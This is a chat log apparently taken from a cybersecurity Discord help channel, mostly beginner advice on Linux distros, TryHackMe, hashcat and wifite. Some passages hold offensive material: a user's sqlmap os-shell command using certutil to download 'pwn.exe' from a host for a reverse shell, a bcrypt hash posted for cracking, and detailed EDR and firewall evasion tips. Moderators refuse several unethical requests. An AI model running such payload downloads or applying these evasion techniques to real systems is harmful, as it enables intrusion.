#👥・help-me
1 messages · Page 10 of 1
yeah
that'll be a pain if he wants to operate it solely for cybersecurity
i dont know, i don't like ubuntu
Yeah it takes alot of time
Well a Kali VM would be the way to go
i think Parrot is more stable than Kali on the main OS
it's not stable, but it's potato-friendly
Yeah i only use kali on my pc but on VM
so it'll run better in old laptops
For bare metal tho could be a pain if you go to update and upgrade your Kali packages and everything breaks...
That is what i'm scared of
Chances are you won't need every single tool Kali comes pre installed with either...
Yeah for sure, i dont even know some of them
what about Parrot?
I haven't tried parrot
I use Kali VM and pop os as daily driver... Just install tools as I need them... And installed some other things like syntax highlighting, etc...
it's simple tbh. you want speed and less lags, use parrot. you want efficiency and robustness, use kali. both use apt and have a wider support for tools. also select displayman with caution as kde can desperately reduce performance
I like some of the features pop os has like encrypted storage, history auto complete etc... and it's made for bare metal... Can always check out system76 laptops.... Can get up to 96 Gb ram and 12tb storage....
But it does not have tools pre installed, it looks fit for my laptop, but i dont knwo yet
It does not... But they can be installed if you know what tools you need...
I no, I want to locate where I can pay for them and if you have a free one you can help me with I don’t mind
hey anyone have expertise in hashcat
its showing balck screen while i running it in windows 11
run it in linux
He's probably trying to utilize the gpu and would need to be ran on host machine... You could always try john on Linux machine or an online hash cracker first... Might get lucky and hash has already been cracked... Or you could do hashcat from VM might just need to add the force flag but then you are not utilizing gpu, instead cpu which would be a little slower...
yap but i cant give the dedicated gpu to the virtualbox
and without dedicated gpu its no use to run the hashcat
yaa
i tried all the drivers and all possible options
cuda and all
Ok here's the real question... Is the hash for a ctf or real life???
ctf offcourse
i just trying to decrypt some salted hashes
i updated my graphic card's drivers recently is the issue related to drivers
@upbeat veldt
not if you're doing a ctf. i usually use hashcat in my vm for doing ctfs and i don't find a problem at all
If it's for ctf then chances are it has already been cracked and could possibly find it on online.... Could try hashes.com or crackstation... Also John the ripper can crack salted hashes might be slower than hashcat but if all else fails id go with John...
yaa but it is very time consuming though to do it in vm specially doing brute force attack
ok i will try by doing it with John the ripper , Thanks
True but as of right now you are not cracking anything....
yaa
if it's not working in windows, you better save up time and at least start it in the vm for the time. ctf devs know you will use rockyou and they won't keep the entropy as much because they want you to crack the hash
yes i will start dictionary attack in vm , Thanks
also figure out what hash ID to use now that you'll be running it
yes its 3200 i think
Thanks
Hi can anyone tell me what can I use to encrypt my voice through phone call
(+) use a cryptographic radio technique used to obfuscate your sentances
any advice for starting out c++??? should I use codecademy to learn, or what is the best way to learn
thanks
no problem
there are many other resources tho
this the one i liked
and about paid courses im not pretty sure about them
Is connectbot a good ssh client for Android, I've used it before it was ok, I didn't use it again after a while
gm y'all
please is there resources or video link that'll take me from zero to hero in cyberSec.
i already have kali installed in a vm
Check #1181325692823150642
thanks
is there anyone with a team tryhackme subscription? I'd like to join and pay.
the single one is expensive.
or is it possible to learn well without the premuim?
i would start off doing all the free material first before jumping into a subscription. will save alot of money that way .... can even do the free stuff on THM then transition in the free stuff on HTB
ohhk
thanks for your advice my good ser.
what's HTB btw?
no problem, Hack The Box
i would suggest doing that 2nd if you are just starting out since those machines are a little harder than tryhackme
ofc
thank you
anyone can suggest a secure good vpn that i can use
@hazy panther https://youtu.be/KWVte9WGxGE?si=z3SlTDqKXSrGKB-0
How to set up a dual drive dual boot, with Windows on one drive, Linux on the other, and the BIOS boot menu used to select between them. Video also demonstrates a single drive dual boot setup.
The Linux distro shown in this video is Linux Mint 21, which I cover in a video here:
https://www.youtube.com/watch?v=s74cta1cpRY
And I have a tutorial ...
I saw that this helped one person
Might be the case
Idek
windscribe for mobile
proton for pc
Mullvad
ok thank you
I'm just learning basic html amd css, how do I make it so that a button changes color when I hover over it the same as doing cursor: pointer; makes the cutsor a hand when hovering over button?
button:hover
I'll try it, thank you very much🤝
button:hover {
background-color: green;
}
I'm kinda not on my pc now but I'll definitely let you know when I try it
alright
no problem
anytime
yo
yeah
yea so what do you need help in bro tell me
Goodmorning
morning!
guys anyone knows how to get ip address of an insta user?
@quasi berry did u find any thing
I did not
Where do I start with hacking and what programming language should I be familiar with?
I recommend trying out tryhackme[.]com
solid knowledge
then jump into hackthebox, start with starting points then machines
you could check out hackthebox academy too and choose what is better for you (tryhackme or hackthebox academy)
Theoretically speaking
Could i buy a chinese ev
Jailbreak it
And play mario kart
is there like some kind of rubber ducky/OMG like thing i could use to do that?
Wdym by a Chinese EV?
Read the #📜・rules
I think he is trying to say a cheap EV
Yes
You can definitely jailbreak the thingy, and play games but I don't see that running well
I don’t understand how you need a rubber ducky for it
You don't
Yeah this is the place
Let's get to business
How much do yk about Windows?
You're gonna need to know fundamentals of both, and Networking; For Networking you'll have to cover stuff like TCP/IP and OSI model
Windows is used a lot on servers and stuff. For now you can learn fundamentals and stuff, then eventually you can learn NTLM, Kerberos, etc
We have a #1181325692823150642 channel where I have put a ton of resources. HackTheBox Academy, and Tryhackme are 2 of the top recommendations; do you have any specific VARK learning style?
This is what VARK is; and if you're neurodivergent (like myself) then you may benefit from a more gamified platform
Yeah so if there is any which you feel fits you, lemme know so I can fetch you some learning resources which will hopefully be receptive for you
So hands on stuff
Check this platform out and lemme know how you feel about it: https://www.immersivelabs.com/cybermillion/
You can also @ me
I know I have the mod role, I also have the mentor role because this is my thing :)
I'd say start with following A+
There are plenty of resources pinned in #1181325692823150642 so feel free to check those out too. When you get onto looking into Windows and Linux then you can install VMWare eSXI, Parallels or UTM which are virtualisation software for Mac, it'll allow you to setup VM's so that you can setup networks and stuff.
Typically pentesters will use a Linux based OS (Parrot / Kali) for pentesting, so you could setup a Linux distro as your attacker machine, and setup Windows machines on a VLAN which will include the Active Directory, Domain Controller, and then the Clients.
Don't jump straight into doing that with virtual machines unless you're at that part so you're able to follow the video or whatever it is that you're using
And if you have any questions, or would like me to personally go over setting stuff up like that with you then let me know
Yup
It wouldn't hurt to set it up, though it will come up later on :)
Here is a cheat sheet for linux commands: https://cheatography.com/davechild/cheat-sheets/linux-command-line/
Typically you can find cheat sheets for tools, and if you can't then use man pages, -h, or --help on the command; any decently programmed tool will have a help menu
And if it doesn't? It's a shit tool 🙏
Do not be afraid to play around with Linux either, and if you ever get into the privacy side of things, you can either check #1187866812235386920 or my page: https://ben4sec.wordpress.com/services/ :)
Sometimes @mortal phoenix comes into the chat so if there's smth Windows related that I don't have the answer to, he will know. He's currently at the defcon hotel rn so his interactions here will be limited
i do some windows too 😦
that's fine hehe
What does dark blue mean
You mean Purple?
🙏
Yeah
Good morning professions,
Please I need resources to prepare for CISA exam.
I will be glad if I can get any useful resources to help me prepare better
Which CISA exam is it?
I see a goat typing
You’ll definitely want to know Windows and Linux as you get deeper into this. Those are predominantly the two main systems used in the world. Linux for servers (some of us use it for desktops but not so much in enterprise), windows for desktops and servers. Active Directory is still huge in Windows even though businesses are shifting more to Intune/Azure for a more serverless solution called DaaS (Directory as a Service).
You’ll definitely want to understand IAM (Identity and Access Management) concepts with AD e.g. Kerberos. But also LDAP and maybe eventually OIDC, Oauth, and SAML.
Like @quasi berry said I’m at Hacker Summer camp this week currently at B sides, then will be at DEFCON at least until Sunday
Goat is still typing
do u prefer parrot OS?
Mac will, IMHO be a hindrance and limitation in the long term when learning a lot of these things. It can get you started @chilly merlin but there’s a reason I ditched my own Mac about a decade ago
For laptop to have bare metal offensively security Linux installed without too much tweaking, yes. When I get home I may play with Black Arch though as I hear good things. Kali is better IMHO as a VM or flash drive
Bloody wonderful response; I was expecting a good one but damn you went all out with that 🙏
I just do what I wish was there for me when I started 😅
good to know, just wanna have a main OS to both study and to use the tools to my advantage
Parrot is a good blend of daily driver and security tools. I still prefer Pop!_OS for my daily and gaming as they do a ton more polish to make it great for gaming but I have it on my System76 Pangolin and will get more into offensive security once I finish my CISSP and maybe CCSP
nice, thx for the response 🔥
I couldn't agree more with Pop!_OS tbh
It's great for gaming, and if you have a nvidia graphics card then you can choose the download which has the driver pre-installed though it is not difficult to install the driver yourself via the store or cli
Yeah but did you hear Nvidia is open sourcing kernel drivers starting with 560?
Wait wait wait, they are committing to doing this?
yall are nvidia users?
Yeah found a link on mastodon last night as I was flying one sec
Yeah
This is news to me
Yeah 3070 in my Linux workstation (need it for LLM’s and some hash cracking tinkering)
Intel HD graphics?
3050 in my windows enterprise stream box
Did you one better GitHub @quasi berry https://github.com/NVIDIA/open-gpu-kernel-modules
on my gaming pc, its just a radeon rx 6600
I hate hate hate intel's menu for changing stuff
The menu name escapes me 🤣
u know what, i can agree with that
Oooh
It’s like Ohio weather don’t like it wait 15 minutes
😭
That is one way of putting it, and customisation is minimal last I checked
Yeah I’m all in for AMD right now until RISC-V gets there then fuck x86 as a whole and fuck ARM too
nvidia make some decent graphic cards, yet they cant make a decent graphical menu
They’re the Beethoven of GPU
How long do you reckon RISC-V will take?
beethoven have to retire someday huh
Right now it’s on par for Core 2 duo speeds so give it 5 years I say 3 at best
Fair enough; if they somehow surprise us in less than that I will be gob smacked
I didn't want to put payment method
@quasi berry what can I do
Is there a way to find out which number is behind a private number?
Anyone have any tips on how to treat RSI from repetitive m and k use?
I've been typing too much 😭
what's rsi
hihi! i was doing some tests in a website and in both my nmap results and nessus scans results, i stumbled upon an akamaighost server (and i imagine that its a proxy to protect the original target)... is there a way to bypass it?
Hi guys I need help can anybody help me with internships like where can I apply I am looking for an entry level job but I am not getting anywhere , please help
idkk if i'm allowed to help with that. @shadow fractal
different countries have different platforms. i think indeed is everywhere
I've sent it to him
thank you 💜
It’s not helping tried indeed linked in
try just googing <position> <your_citty>
We do not do taht here
what experience do you have btw if i can ask 🙂
thank youuuu
Thank you @uncut wedge and @shell sinew
I am a diploma graduated as a computer programmer in IOT as specialization
And I am a fresher so yk it’s so tough idk I am just so tired of getting that mails unfortunately
oh sry sry
i didnt know if it was considered unethical because it is a vdp program
We do not truly know full context
You did a scan
You found something
Thats why we refer to rules and from this side it is unethical
If you have the proof
For the vdp
oh wait
make as many connections as possible. attend meetups, conferences etc, socialize with people, write them mails or connect in linkedin and develop a bond. they can directly have you qualified for interviews. also you can directly apply to companies using their portal without linkedin or indeed. also connect to professionals in iot applications and talk to them. doesn't matter if they don't respond
sometimes it can take time but you'll get positive results 🙂
https://hackerone.com/expediagroup/policy_scopes i was checking this one
ohhh you're doing a bug hunt
this one in specific is their vdp program!
got youu
Right thank you for this I will do that thank you I appreciate ur help and also if u guys have any idea for internships, can u get me somewhere?
general rule is you don't do nmap scans on a live target 🙂 nessus is oki because it's less noisy. you can do a stealth scan in nmap but it will still trigger alarms. i can't straightaway tell you how to bypass it but do more recon on the proxy. it will 100% be using whitelisting rules and cookie policies. you can use postman to try to manipulate cookies. also i have seen akamai servers use websockets to communicate with the assets so if you figure out what websockets protocol scope is using, you can try looking up bypass tck. also don't forget to tweak with api if in scope
normally apis have direct access to certain resources without proper csp
okay! ill do more research on the proxy, and thanks for the advice with nmap! (and sorry about earlier 😭 ill try to be more specific next time)
it's fine, and good luck 💜
sankyuu!!
repetitive strain injury
aka my pinky finger hurty cuz mouse :(
i usually take anti-inflammatory and do cold compress
Like a cream/lotion?
mm ibuprofen and a bag of ice works for me but maybe an anti inflammatory cream should do the job
Yep im one and a lot of people are
Yes
What are some good learning resources to become a self taught hacker?
How can i become one?😶🌫️🥺
if you want to learn i recommend going to https://tryhackme.com/ and do the pre-security and introduction to cyber security
Thanks brother 🫂
i never went to uni
Regarding?
can i get help on how to go about on this. Text4shell & CVE-2023-22809. I don't know where i can even start from
Can I get help on finding my school acc password I forgot it
Contact your school's IT support.
who is it support
exploit-db
....
its not there
nicee
@shadow fractal @quasi berry
I will pay good money to get work done...
what work
@quasi berry dm me
Why?
Wanted to know what kind of work you wanted it done, sorry if I offended you.
he wants to root his institution tablet which in one sense is illegal
@quasi berry up
It's not me looking for work to be completed?
Idek what Ant is referencing here
@quasi berry
Ohh yeah since it's not his that is illegal
yess. he's asking for people from here to root it for him for money 🙂
If he continues he will be punished
bonked
Hi
Hey everyone, I don’t speak English well so sorry in advance. And I’d to know if someone knows how can I recover my instagram account. I don’t have the password anymore neither the mail which is linked to it. Can I get some help..?
And also is there anyway to download all TikToks from an banned account or not ?
No
Instagram support can help you with that
Alright I’ll see that thanks ✨
No self promoting
okk
I need to hack a scammer
We do not do that here, #📜・rules
what are evasion techniques for firewalls when establishing a shell instance ; so far I know encrypted connection, fragmentations, and packet manipulation and im wondering if there are other techniques used to reduce the amount of noise created to evade SOC Analysts
there are many possibilities. dns tunneling wherein you communicate to your shell via dns queries, lns (low and slow) attacks where you send data in irregular fragments to avoid rate-based detection
umm
then you have polymorphic shellcodes
that tweak themselves with each execution to avoid heuristic detection
yea ik that but its on disk and memory
im not worried abt that i can stay hidden from AV and EDRs im just confused abt network traffic
if i was you i'll worry about edrs more than i'll worry about network persistence. you can persist the connection with encapsulation on a specific port that the domain is not too concerned about. you will be needed to do some trial-n-error with the waf to figure out which endpoints are whitelisted
the main problem is how you will counter the edr
edrs are notorious for killing connections with shells that run in memory
interesting
there are myriads of techniques to evade EDRs (which i am familiar)
after seeing what you said im pretty sure in my case its that im more familiar w EDRs than firewalls
they have several dll droppers that execute themselves into the memory to figure out how the process is doing, then having appropriate actions to stop it. there are certain tricks of bypassing this such as preloading or tartarus' gate but not all edrs will have a delayed execution sequence
unhooking procs and indirect syscalls are also there
wait
nvm
in most cases you won't be privileged enough to unhook a process or issue a syscall because you'll be sandboxed in a powershell session. in such cases escaping the box is possible by updating registry keys which bridge between an unauthorized session and syscalls. you need to figure out which registries/privs allow that to happen. i'm pretty sure that, or certain directories are whitelisted which bridge between both realms
ion mean by that type of thing
what i mean is the way EDRs monitor ur program is by injecting a dll and hooking API calls so what you would do is either override that dll so it would terminate process or u manually call the functions via inline ASM and jumping to syscall to ntdll after setting up registers to call winAPI functions without having it hooked
yess, but it will have many challenges as well the first one being the detection of dll tampering. the edr can simply detect the tampering and kill the tampering process instantly eliminating your shell. another problem is inline asm like you mentioned. if you make any human error in calling out the functions it can trigger alarms. also nowadays edrs come with insane behavioral analysis models which instantly catch malicious syscall usage and quarantine the suspected process
also edrs such as sentinelone now offer kernel-mode hooking, which makes it close to impossible to bypass their monitoring based on user-mode evasion techniques. there are some methods to counter this but I can't disclose them
thats what blackbox testing is all about :3
put in the hours to reduce the errors
truee 🙂 it all depends on trial-n-error
nothing beats that :3
or almost nothing
cant beat ring 0 detection being above it 😔
yess. people generally undervalue what edrs are capable of and that's oki. the average av is faaaaaaaar more simpler in logic and function than an enterprise endpoint security solution
real
Hi @uncut wedge
I'm trying to run the wifite and i had to go get a WIFI adaptor i got (Nighthawk® AXE3000 WIFI 6E USB 3.0 Adapter) and it should be compatible with kali but it doesn't show that
Need help to crack this, taking ages (probably need a good word list) $2y$10$kQ0KEj2apt2rMAGX15FC8.o6AX7CtUGtfG2isOkB6DSuufq/OTYNu - Possible algorithms: bcrypt $2*$, Blowfish (Unix), bcrypt(md5($plaintext))
I'll highly appreciate
@quasi berry
I'm going out soon
hii
use the bcrypt algo to crack it. you can use hashcat and rockyou i think
also make sure the hash isn't salted
Thank you for keeping me updated; how are you finding it? :)
That's wonderful
Hi everyone, I saw srhoe on instagram saying that he found a way to watch a private instagram story, y’all have an idea of how to doin it or not ?
Watch it privately* not watching the story of a private account
I'm good. and you?
i'm oki at work
heyy i want learn how to hack my friends passwords
Don't dare start a love chat here .. 😉
what do you do?
i'm a jr pentester
Come on. Let me have my fun
thank youu 💜
Cool
Are you an intern.. or you work solo.. for self benefits...
i work full-time
working in a forbes 500
Ohh you are like people who could be 24 years but have 30 years experience...
That's the Dream.. till Mr.Robot shows up..
lol... i'm 20 tho 🙂
ehhh
With 45 years experience..
nooo stop flattering me here
what about you man?
what's your exp?
That was not my aim.. but I'm sorry if I offended you
-75 years..
you're all good 💜
heh 😆
How does if work? 20 yrs at full time . I'm 19 but I'm college.. I don't seem to comprehend..
same man 🤣
i never went to uni. just studied upto high school
You in Cyber security?
me?
Yeah
since i started cyber sec i began thiking why i did not do that...
Young prodigy I see...
🙂
yeah it's been 3~4 months since i started
that's oki
and third year cs student
my parents couldn't afford my uni that was the main reason
I'm in Computer Science.. but I dabble in Cyber security
dabble?
ohh yeah i feel that
But you are working at a good place... That's Good luck
but it turns out to be great
Sometimes partake in...
yess i did a lot of h1. that got me a job at where i'm working
ohh
how many vulns did you find?
i reported 4 in the company that called me in including a 8.0 race condition
I bet that also causes sleep loss too...
Whoa... A young prodigy....g
you rock 🔥
At this stage.. you could be an admin here...
it initially did and i struggled upto the point i was about to give it all up but i soon started seeing results
that's the hard part seeing results
thank youuu but no the current ones are doing their best 💜
Same... I sleep by 5am most times...
when i was starting i found like a couple of bugs but they where duplicates and till now nothing
i submitted like 30+ bugs where 6 were duplicates so just keep looking 💜
a good sleep schedule will help you survive laziness hehe
could we do someday a bug bounty together?
That's just it.. I can't sleep no matter how I try.. until I complete any task I set
suree but i don't do it much now after my job started. i want to climb the ladders quick so i'm dedicating my everything to the job
I can't tag along.. I'm too much of a noob..
that's me hehe
okay i understand
Please do .. I could apply for a jnr intern under you..
you just take a deep breath and everything's gonna come your way if you work hard to get it
i've been studying non stop for the past 3 months
and trying to find bugs and solving labs....
the interns for this term are full maybe and they're for soc. not sure if they take pentest interns because our work is largely regulated
you'll do greatttt
i believe in you 🙂
Don't worry..it all fine.. my real aim is to help.. my county.. There's so much corruption and billions of stolen fund.. I want to find them and stop them.. like a cyber Robin hood
Me or @sly spire ?
i like the motto hehe
both of you
I might seem a little disturbing. But could I send you a friend request?
Thanks I would vouch for you too
sent 🙂
thank youuu
Whoa.... I'm kinda an introvert so everything seems strange..
aren't we all
I could swear my case is more unique..
procmon is all about analyzing registry access patterns, network connections and communications and process activities. apimon is mostly winapi behavior analysis, debugging applications etc
Heavenso. I’m brand new and don’t know much at all about coding nor programming even though I’m pretty resourceful and know how to use a computer well. I need to learn the basics and don’t know what’s the best coding language to start with?
Also, I got a free trial for spotify and tradelle and want to try dropshipping. I’m struggling really hard with what I’m doing though and don’t want to give up. It was 7 days free trail and I have 2 days left. I want help getting that working and test it out while I still can :/
If anyone is willing to help me please lmk! I need help!
for the first answer, python
Thank you! I’ll look into learning Python for the first coding language to learn. Where can I start learning that?
Google is your best friend... There's a bunch of resources out there.. pick one and learn the basics then work on some projects.. just google "python projects for beginners"
Thank you! I’ll get started on that
You're what??
you're welcomee 💜
I believe that is where they see colour from sound/smell?
Double checking
Oh nvm
If you don’t quite identify as an introvert or extrovert, you may be an ambivert.
Has nothing to do with what I mentioned 😭
What I described is Synesthesia
tooooooo faaar
also @wooden anvil hiiii hope you're okayy 💜
is anyone use tryhackme now?
I thought ambivert were people who likes to hang out in little group.. introverts by themselves and extrovert within the friend group
oh
Yess she's okay :)
I'm fine..
(I identify as @wooden anvil )
😂😂
yayy nice to know
Not funny
On point..
Ok.
busy bees achieve it all 💜
Yeah she was doing metasploitable; Ima be so happy for her when she gets her CISSP cert, I believe in her
Never heard of such thing 💀
Now you have
amazingg i'll be happy for her too
I'll also get my CISSP someday, I'm just so proud of my pooks, she's going far and it endears me that she's so determined in figuring stuff out herself; though if she gets stuck stuck and it's not a "google" solvable problem, I am sure she'll come to me. She heals me.. 🥹
the healing is eternal hehe. you both are luckyy to be with each other. hopefully i find someone who can heal me up too
Her presence has been of a cleansing nature for me; and I hope that for you too Mimi, though for now with your recent break-up (If I'm remembering this correctly?) focus on yourself for a bit and then find someone who is willing to heal with you. Nobody can ever 100% be healed, nobody is perfect so I do not see why it should be a barrier
truee. i'm giving myself some time to cope up with it but sometimes the mind just gets filled up with thoughts you know... i'll be okay tho
tysmm 💜
Well u got from benny
Og motivator benny
Wait what 4th line
That's good; and if you ever need to talk my DM's are open. I know what it's like, and tbh I was worried I was going manic last time as I would not sleep at all. "I'll be okay" yeah eventually but doesn't mean you are okay right now, which you're not and who knows how long it'll take for this to pass; you have my support, and you're not alone 🙏
4th line?
Break up
What are you on abt
Yeah Mimi had a breakup with their now ex; I'm confused what you're questioning
That's it
Mimi thingy
I wonder how u found out
Nvm
Not gonna get into details
I know that feeling
Because it was discussed by Mimi
aww tysm for this 💜 i'll keep it in mind
Here?
Yeah
Hmm we are with u mimi jus ping me when u feel low @uncut wedge
We will listen love failure songs together
Currently listening one
Please how do I setup this tryhackme so I can do it on my laptop
Wat
It says I have to use openvpn
I don’t know how to set it up
That one
Its easy
Find a YouTube video
Or else ping me
Alright
Thank you
https://youtu.be/IvUsXg8dKds?feature=shared. @chilly merlin
Hi Eveyrone,
This is one of the first videos on this channel related to TryHackMe plateform. If you want to connect to TryHackMe labs using your VPN on Kali Linux OS, use this video as a tutorial.
If you want to join the sessions live, feel free to join below Telegram group :
https://t.me/+q3NdEnx0DQc3NWQ1
Don't forget to like & comment fo...
If u still having a hard time
Thank you @chilly merlin
Happy hacking i say
Trap is here
To say something
Also id suggest downloading and using us-west-1 config for OpenVPN as it seems to have the most success rate... I know a bunch of other users were having issues trying to connect to THM network...
Thank you for the help @upbeat veldt
I will do exactly just that
You have been wonderful so far
Well there are good peeps jus need to find them
thank youu 💜 i'll remember to
noo please i'll cry...
wsg guys
Hi guys I'm new to all hacking can some one give directions how to start my journey?
Id start with tryhackme's complete beginner module and then look into some of the other modules that peak your interest. Once you get comfortable enough on THM then I'd suggest to make the switch to hackthebox
Thanks for the tip I'll try my best
Good luck have fun 🎉
Obsidian is nice tbh
Sadly I am not too keen on using it
I am that person who keeps everything in my head
A more simple explanation 
Ech, idk why, but if things are hardwr to accomplish I like it more
Weird thing
Notes would help me a lot
But I just can’t get myself to do them
Idk why or how
But maybe sometime
Other then that, back to original topic, most of peeps I know use Obisidian
And the responses are quite good
Not perfect ofc
As per everywhere, there could be better things
How did you guys manage to memorize the abundant terms and acronyms? Ive always struggled with termonolgy and rout memorization.
Its not entirley impossible for me to do of course. But some I do want to learn a few habits to make this a skill I can utilize.
Mmm Ill have the repetition down by nature of the task. But Mnemonics and contexual learning are something Ill look into.
Thanks ;3
does anyone know some good university to study a MSc in cybersecurity in EU? much appreciated in advance
Oxford
Delft
Twente
Europe?
Or union
Anyone has any experience creating an instagram bot?
Yes
I need help with my wifite tool (ModuleNotFoundError: No module named 'wifite.wifite')
Hey guys
I am using a windows laptop for starting cybersecurity
do i need to use linux itself like dual booting or use virtual box or can i just do everything in windows itself
(i am doing CTFs and bugbounty , HTB and TryHackMe)
Troubleshooting and fixing issues with Wifi (specifically Wifite) on Kali Linux.
Need help? Join my Discord: https://discord.com/invite/usKSyzb
Commands:
hcxdumptool:
sudo apt install hcxdumptool
hcxpcaptool:
apt install hcxtools
pyrit:
sudo apt-get install libpcap-dev
sudo apt-get install python2.7-dev libssl-dev zlib1g-dev libpcap-dev
git c...
Nope
Many tool available in kali
But u can use wsl
Or vm
so I should use Kali as it has many tools already (VM) which are not available in windows?
Depends on tool u work with most
I prefer vm cuz it keeps shit seperate
ohh ok ok like that tx so much
Xddd
idk but prob i installed something wrong but it's not that, the wifite works fine except for today i will just check my history again and see if that helps if not i will get a different machine or reset this one
Delete and reinstall
@uncut wedge (don’t kill me)…. Boot using Linux as Windows sucks
You mean dual-boot sucks?
I just HATEEEE windows
I just deleted it and going to download again start from 0
I hate window everything
I still use it I shouldn't; I am gonna get a laptop and use Arch or smth
I’m on the fence abt arch
Idk yet
Not bc the install
Just bc I looked at so many others
Like I may do qubes
Or the kodachi
Or tails
I have yet to use it so when I do, I'll deep dive into it and stuff
Kodachiiiii
You like it?!
Yeah it's one of them which I like
Ok I’ll start there
The- The- THE WEBSITE has changed
I wanted to ss the bit where it compared to tails but it's gone
Lemme archive.org this shit rq
News and feature lists of Linux and BSD distributions.
is it me or byob don't work?
What is the site?
:)
Yo ben
Who is this
Developer of Kodachi
For this
Do you have any ideas on how i can get it to work in python?
Just figure out how the cipher works
And then make it in code
You would need to use numpy
Yay
😦 it's oki
😭
Wait mimi likes windows?
UwU
Yeah i wanted help from the master
@uncut wedge
yess i'm a windows gal
??
God i hate those question mark signs jus checking on u
My quest was completed
I’m a unix boi
loll oki
i'm oki thank youu 🙂 wby
eh
Grinding
grinding wheree
eh~
And company placement
toooo much
eh#
eh~~
eh&
Placement India?
You sound like you getting on campus placement like they do in India
Wat
U know how market is in here
Overpopulated
Yea
No skill though
Jus trash
That's where i capitalise
Anyone know anything about gym plans 😭
Is this good 😭
Saturday - shoulders + forearms
Sunday - back + core + trapeze
Monday - legs + core
Wednesday - chest + forearms
Thursday - bicep + triceps
I heard at my friend’s uni people were hired at Apple who knew nadda
India peeps at foreign are valued more but not here
Good workers in their opinion
They were hired at Apple India and knew nothing
My friend is Indian
I know bruh
They are in big college that's it
No skill whatsoever
Companies will realise eventually
That isn't a neccesity
Or they had connections
Yep money
I need to crawl my way up
Tough competition
No?
Then what quota means
Companies have a internal quota to show that they promote diversity even if they do not
Never heard of it
Any ways I'll try my best
I just got an Error that says Target did not appear after 60 seconds, stopping appear
Wifi off maybe
it's on i wanted to send an screenshot to show what i see but i can't
Imagur
what's that?
Wait what
hi i need help with cracking pdf file, why? i got wrong password and can't ask for correct one I wrote but they don't reply to my messages
thank you
Have you googled this first?
i tried but no asnwers at all
Jtr
?
Does the job right
If i recall correctly
What did you try googling?
Hmm
nvm
I'm trying to get it done at least once i need it for a project that's why
Did u take a look a forums
not sure what's that but i searched it in git hub if that's what you mean
Yep
Something must be wrong in wifi or in monitur mode
i have seen few other since 2013 struggling but no anwsers
Hmm
Better to use other tool then
Since Dev are unable to solve
Or use lower version
that's what i'm thinking about but getting too late and i have to communicate with my professor and get approve for it and kind of presenting on Wednesday i will try the lower version before i give up
Yep
thank you i really appreciate the help
anyone want to test the ctf i made?
its crypto :D
let me know if its too simple
because i can turn up the complexity
dm me if interested
(may respond a bit late)
i can't really suggest any tools or methods without checking the environment first. if it's a commercial pentest you need to simulate the attack first before doing anything crazy like running linpeas 🙂 these scripts and tools often hammer a lot of different areas within the system and that's instant death if the target has a av/soar
if it's an ad, you can use bloodhound for the relationship tree first. bh is pretty stealthy so you can try running it in production
Hello
thaaaankyyy i’m barely surviving uni and i just want to get things over with grrraaahh
i appreciate you
yall
bring your own drivers and exploit them
hmm not rlly i just pull one randomly and start working around it
We dont do anything unethical im sorry
soo like kidnaps you, you're a keeper, and I miss you sm rn
the fortnite pfp😭
Wassup
Use imgur
Remote desktop protocol?
Mmm chat a lil more so you level up
Dont spam
Tell me how was you night
You still up?
my school starts in 2 days
Lol
Nice
ive been studying for pre-sat
no
im the one talking
bc
im the one that needs leveling up
so
how much
do i have to level up
in order to
get help
from u guys
Send an image yes
huhh
Dont spam try put the words together ok?
Not really you should level up any minute now
lets goo
What are you trying to do
setup a rat
…. Is this unethical
dude
what the flip
do u even accept black hat hackers
in here or would i just get a ban for that
u urself are labeled as black hat hacking
oh noo
its just
to test stuff
i am actually testing their program
its ethical
yes i am just testing the code
that is my job
i test code
wellll

okay what flip theres the doxbin emoji
but
dw
Its unethical we cant do that here
its ethical
?
u guys have a good day then
Jeez
Now why would we do that? 🤨
BECAUSE
Rightly
Even blackhats follow the rules
this is so
No, don't "BECAUSE" me 😤
white hack
in the description of black hat role
We don't help with anything black hat
People can join and use the role, doesn't mean they can come and ask for help setting up a C2 and ratting a bunch of people's IoT devices
.. i just said they can use the role but follow the rules
okay we split profit 50/50?
No
jkjkjkjk
…..
okay ima go
goodbye
wait dont ban me though
this is a good server
ill bump this server
and follow the rules
how to bump server
/bump in #👊・server-bump channel
Have to wait a minute the bumps is every two hours u got 1hr left to bump it
Dont 😭
Yk there are black hats here which respect the rules.. it would be lovely if you could respect them too
okay okay bro
leave this
As a mod here, I will do that of my own volition :)
bro
i mean
i respect the rules
i learned from my mistakes
so
Thank you
All good 🙏
even for running bh, you need to disable the av in most cases because it's still an executable and antiviruses don't like it. they either will remove the executable or block the execution. you can try running it in \users\public or %TEMP% as those two are sometimes whitelisted
ahhh good luckkk 💜
Who here does app developing for pc? ?
again, depends on the av that's there. bitdefender and norton are notorious for catching malicious processes running in memory. i think now many avs do it, you'll need to look for whitelisted dirs nonetheless
also don't forget to check privileges of the foothold you are in
privileges like seimpersonate can be exploited if certain conditions are met
Need a app developer
Don't Just Say "Hello" in Chat.
Anyone willing to play test my ctf?
its the first ever CTF I've made :D
Its crypto
And very phun
What’s CTF
its a challenge
It stands for capture the flag
For crypto ctfs the flag is encrypted
You need to decrypt it and get the flag
Like a game
I made one and need some people to try to solve it
Can i run wifite with this one i have been trying for days and kinda running out of time should order a different one or which one would you recommend I JUST WANT TO GET IT DONE.
Get support for your Nighthawk A8000 wifi adapter including guides, troubleshooting articles, the latest software updates, and much more today.
Hmm
it support monitor mode but not sure about packet injection
I use tp link
i will look for it rn
I need tutorial on python
yo its not unethical hear me out pls
What is it?
What board?
u got insta?
Why?
We can discuss it here, or not at all
CS50 Harvard
thats probably the best one
I found this one at Best Buy I can pick up today but is the same or a different one (TP-Link - AX1800 Nano Wi-Fi 6 Wireless USB Adapter) @chilly merlin
is there a national public data records breach download or atleast checker for myself?
Hey, can someone tell me wich study plan should i follow in tryhackme before i try to go into the red teaming path?
you got roadmap here
Check whether it support monitor and packet injection and compatible with linux mainly kali
I’m at Best Buy they all are windows just like what I had so 100% gonna order the panda one it’s arriving
Alr
Tmw
Thank you
Jus don't
Wat
bot continue delete msg
?
hey everyone im new to cybersecurity any recommendations on what I should be focussing on in terms of basics?
👍
anyone help in msql i got xp_cmdshell in a window sever cant get a reverse shell
os-shell> certutil.exe -urlcache -f http://192.168.1.119/pwn.exe C:\Users\Public\pwn.exe
do you want to retrieve the command standard output? [Y/n/a] y
[23:28:40] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[23:30:10] [CRITICAL] connection timed out to the target URL
is there any way to fuzz mutiple urls using ffuf ?
no its fine dw
well i found a solution by trying a bash script
like this
